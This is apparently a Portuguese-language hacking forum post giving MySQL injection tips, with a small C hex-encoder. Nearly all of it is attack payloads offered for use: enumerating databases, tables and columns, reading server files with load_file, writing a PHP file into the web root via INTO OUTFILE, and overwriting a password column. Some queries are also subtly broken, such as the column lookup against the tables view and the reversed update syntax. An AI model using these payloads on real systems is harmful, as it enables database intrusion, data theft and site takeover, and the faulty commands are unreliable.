[Dica]Mysql injection

Existem mais de um milhão de tutos sobre sqli em mysql , isso aki é so um dica de alguns comandos uteis, pode ser usado quando a versão do mysql é acima da 5.0

descobrir o nome dos db's:

select group_concat(schema_name) from information_schema.schemata

descobrir tabelas de um db:

select group_concat(table_name) from information_schema.tables where table_schema=nome_do_db_encodado_em_hex_0x61

descobrir colunas de uma tabela:

select group_concat(column_name) from information_schema.tables where table_name=nome_da_tabela_encodada_em_hex_0x61 AND table_schema=nome_do_db_encodado_em_hex_0x61

Ler arquivos do server

select load_file(nome_do_arquivo_em_hex_0x61)

Criar arquivo no server:

select '<?php phpinfo(); ?>' INTO OUTFILE '/home/site/public_html/out.php'

alterar valor de uma coluna:

set tabela update coluna='novo_valor'

exe: set usuarios update senha='nova_senha'

Você pode usar o count(*) para descobrir quantos databases , tabelas e colunas existem , eu eskeci qual é o comando pra ver qual é o tipo de dados (tinyint,smallint,float,char,varchar,text,etc ...) se eu lembrar eu edito o post '-'

source de hex-encode:

#include <stdio.h>

void hex(char *buffer){
int x;
printf("[*] hex: 0x");
for(x=0;x<strlen(buffer);x++){
printf("%x", buffer[x]);
}
printf("\n\n");
return;
}
int main(int argc, char **argv){
if(!argv[1]){
printf("\n\n[ DOMLABS NEVER DIE ]\n\n");
printf("[*] usage: %s <text_to_encode>\n\n", argv[0]);
return 0;
}
printf("[*] text to encode: %s\n", argv[1]);
hex(argv[1]);
return 0;
}